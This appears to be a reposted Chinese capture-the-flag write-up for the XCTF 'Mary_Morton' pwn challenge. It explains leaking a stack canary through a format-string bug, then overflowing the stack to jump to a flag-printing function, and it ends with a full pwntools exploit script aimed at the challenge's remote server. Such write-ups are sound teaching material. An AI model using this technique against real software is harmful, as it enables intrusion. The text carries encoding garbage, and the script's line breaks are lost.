[攻防世界 pwn]——Mary_Morton

• 題目地址: https://adworld.xctf.org.cn/
• 題目:
  
  checksec看下，64位還開啟了NX和canary保護(hù)。（一般開啟canary保護(hù)，都有格式化字符串漏洞）
  

在IDA中看看，　果然有格式化字符串漏洞



仔細(xì)看看代碼會(huì)發(fā)現(xiàn), 這個(gè)是個(gè)死循環(huán), 1 里面有棧溢出, 2里面有格式化字符串漏洞, 3是退出。
我們可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用棧溢出修改返回地址了。


最近我學(xué)了一個(gè)新的, 計(jì)算偏移的方法,很好用。當(dāng)然你也可以下斷點(diǎn)自己在gdb里面自己看, 自己調(diào)試

一般寫八個(gè)就夠了, 基本都在8個(gè)偏移以內(nèi),和自身的偏移。好像好多都是6, 這個(gè)也是。
因?yàn)?1對(duì)應(yīng)97就是a
然后找一下canary和輸入之間的偏移

所以最終的偏移為 17 + 6 =23
我們還知道cat_flag的地址

exploit

from pwn import * p=remote('111.200.241.244',42124)p.sendlineafter('3. Exit the battle','2') p.sendline('%23$p')p.recvuntil('0x') canary=int(p.recv(16),16) print "canary: " + hex(canary)flag_addr=0x4008da payload='a'*0x88+p64(canary)+'a'*8+p64(flag_addr) p.sendlineafter('3. Exit the battle','1') p.sendline(payload)p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[攻防世界 pwn]——Mary_Morton的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。